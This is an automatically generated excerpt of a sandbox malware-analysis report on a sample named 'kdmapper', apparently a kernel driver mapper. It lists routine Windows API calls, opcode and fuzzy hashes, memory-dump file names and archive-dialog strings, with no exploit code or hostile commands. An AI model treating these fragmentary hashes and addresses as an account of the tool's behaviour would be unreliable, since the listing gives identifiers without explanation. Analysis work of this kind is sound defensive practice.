                                                                                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                                                                                              • API String ID: 445417207-3402441367
                                                                                                                                                                                                              • Opcode ID: 7789bb65d5c36d96c6507c98eee7926224b7492fa2de8488acb4d3dded5e27a4
                                                                                                                                                                                                              • Instruction ID: 47bdea1366414127cf9b9a65f973ef4a8c0e22958a6cf5e736712859c8bb2d91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7789bb65d5c36d96c6507c98eee7926224b7492fa2de8488acb4d3dded5e27a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7110372280204AFD7119FADEC44FBA7769EF4B742F164000F348EB4A0D761A94A8732
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __fprintf_l.LIBCMT ref: 00DED954
                                                                                                                                                                                                              • _strncpy.LIBCMT ref: 00DED99A
                                                                                                                                                                                                                • Part of subcall function 00DF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E21030,00000200,00DED928,00000000,?,00000050,00E21030), ref: 00DF1DC4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                              • API String ID: 562999700-834177443
                                                                                                                                                                                                              • Opcode ID: be8aea5d83b5e88f74d1b00177372a3e6e109128b92ff98ba8964bbddc176cfb
                                                                                                                                                                                                              • Instruction ID: ab96d70b8c7809f3e6cbbfdcd898f774011741d43ffd06aaa4bc938d320a4fa0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be8aea5d83b5e88f74d1b00177372a3e6e109128b92ff98ba8964bbddc176cfb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7218E32440288AADB20EEB5CC41FEE7BA9AF05304F044012F954A61A3EA71D6588F71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E85
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E8F
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Thread pool initialization failed., xrefs: 00DF0EB7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                              • Opcode ID: ac654f99da3a6b76f23d5d430631f29d1941d7abecdf0260014d820fda8d467a
                                                                                                                                                                                                              • Instruction ID: 8db96a7fa53fb1246b54769acf3d2d455acd70f2422fbb5cd43436382be16379
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac654f99da3a6b76f23d5d430631f29d1941d7abecdf0260014d820fda8d467a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16115EB164070C9FC3215F7A9C849A7FFECEB69744F25882EF2DAC3201D6B199408B64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                                                                                              • Opcode ID: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                                                                                                                                                              • Instruction ID: 0e14b9fdc36e6b32fc8f34cddd9af2046d2453c3ff308f2447c2bdd4f2a8a953
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC01B57660434DAFD7206F66FD44ABA7FA7F759344B058026FA05E3270C6309859DBB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                              • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                                                                                                              • Instruction ID: 80ee623d8f7edfb489a0f33a04e0c068e37121422fc15106a24fe1852b4bb9e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9A13672E042869FEB25CF28C8917AEFBE5EF55314F18516DE585AB2C3C23889C1C754
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00DE7F69,?,?,?), ref: 00DEA3FA
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00DE7F69,?), ref: 00DEA43E
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00DE7F69,?,?,?,?,?,?,?), ref: 00DEA4BF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00DE7F69,?,?,?,?,?,?,?,?,?,?), ref: 00DEA4C6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                                              • Opcode ID: 81b89300b535a9b49164f77a21f25447883e597c3f8d7ec2ff2ac5888245e064
                                                                                                                                                                                                              • Instruction ID: 79e7906f1a87305083026aae8593fc95fea8662046e8ca183d5c83bd665fe0b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81b89300b535a9b49164f77a21f25447883e597c3f8d7ec2ff2ac5888245e064
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A41CE312483C29AD731EF69DC45BAEBBE4AB84300F088919B5D4971C1D6A4AA489B73
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                                              • Opcode ID: 603c509ec329b0bdebc540eb41805c3dbf1dc8787e3243a72a172211a84f64e8
                                                                                                                                                                                                              • Instruction ID: 69b06f2b4088f5d3488a4753ef5ff68ef9fc6304c5b2dfbf916930595a2c5f3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 603c509ec329b0bdebc540eb41805c3dbf1dc8787e3243a72a172211a84f64e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3841B675A006695FCB21AF79CC069EE7BBCEF01310F044119FA45F7242DB30AE598AB5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E091E0,?,00000000,?,00000001,?,?,00000001,00E091E0,?), ref: 00E0C9D5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E0CA5E
                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E06CBE,?), ref: 00E0CA70
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00E0CA79
                                                                                                                                                                                                                • Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                              • Opcode ID: ace95bf84e67b0f935b43b06850d6190019107e46303edb08e6b4c617b92273d
                                                                                                                                                                                                              • Instruction ID: a12d8bbd94782e5063a1e4db5becfcd5e0f66fb63b4e99b11738f0643765fff3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ace95bf84e67b0f935b43b06850d6190019107e46303edb08e6b4c617b92273d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7319972A0020AABDB24DF75DC45DEE7BA5EB41314B284228FC05A6290EB35CD94CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00DFA666
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DFA675
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DFA683
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00DFA691
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                                              • Opcode ID: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                                                                                                                                                              • Instruction ID: 3322c7dec92ee66d1782f136e8b61a7b3dd6279e3c50edf774adf76bd4c99721
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E0E635942721AFD3615B766D0DB8B3E54AB16B52F054301F605B5190DB64450A8BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DFA699: GetDC.USER32(00000000), ref: 00DFA69D
                                                                                                                                                                                                                • Part of subcall function 00DFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFA6A8
                                                                                                                                                                                                                • Part of subcall function 00DFA699: ReleaseDC.USER32(00000000,00000000), ref: 00DFA6B3
                                                                                                                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00DFA83C
                                                                                                                                                                                                                • Part of subcall function 00DFAAC9: GetDC.USER32(00000000), ref: 00DFAAD2
                                                                                                                                                                                                                • Part of subcall function 00DFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00DFAB01
                                                                                                                                                                                                                • Part of subcall function 00DFAAC9: ReleaseDC.USER32(00000000,?), ref: 00DFAB99
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 1061551593-3887548279
                                                                                                                                                                                                              • Opcode ID: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
                                                                                                                                                                                                              • Instruction ID: b5e95c13de4512a03588edba774d4c7d17deeb7475af75d0f1503e1075f8159d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6191F3B5604354AFD710DF29C84496BBBE8FFC9700F01891EF59AD3260DB70A94ACB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0B324
                                                                                                                                                                                                                • Part of subcall function 00E09097: IsProcessorFeaturePresent.KERNEL32(00000017,00E09086,00000050,00E13A34,?,00DED710,00000004,00E21030,?,?,00E09093,00000000,00000000,00000000,00000000,00000000), ref: 00E09099
                                                                                                                                                                                                                • Part of subcall function 00E09097: GetCurrentProcess.KERNEL32(C0000417,00E13A34,00000050,00E21030), ref: 00E090BB
                                                                                                                                                                                                                • Part of subcall function 00E09097: TerminateProcess.KERNEL32(00000000), ref: 00E090C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                                                                                              • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                                                                                                              • Instruction ID: c54ab9f055ae1ae0ed3cac41ade5971608fedc4a2ec2f9c4c43848a112591c6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98519D71E0020AAFDF14DFA8C881AADBBF5FF58314F245169E844F7391E7759A418B50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE75E3
                                                                                                                                                                                                                • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                                                                                                                                                                • Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE777F
                                                                                                                                                                                                                • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                                                                                                                                                                • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                              • API String ID: 3226429890-336475711
                                                                                                                                                                                                              • Opcode ID: ef8521668e767bf30a07a7c041c1efa3018ee4150c9a6670d7d4cc21e18e687c
                                                                                                                                                                                                              • Instruction ID: c4ce77baa50198a3336b3817f648e84988160f08fe2f7bb18299da0bdbce00b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef8521668e767bf30a07a7c041c1efa3018ee4150c9a6670d7d4cc21e18e687c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28416271801198AAEB25FB65CC59EEEB77CEF55300F04809AB609A7092DB749F85CF70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcschr
                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                              • API String ID: 2691759472-163128923
                                                                                                                                                                                                              • Opcode ID: 3d9bf66e4d4f6fce1a5934da1789656307f1b4dae49eb9a7affabd00498e0deb
                                                                                                                                                                                                              • Instruction ID: 83ee1b764665099ddfc15e8a7c05f7ce9d527920fe39f4a0734c217efc5ce304
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d9bf66e4d4f6fce1a5934da1789656307f1b4dae49eb9a7affabd00498e0deb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 553114221043819ADB30BA578942A7B73E8DF90B3CB18801FF9C8571C3E766BD819671
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
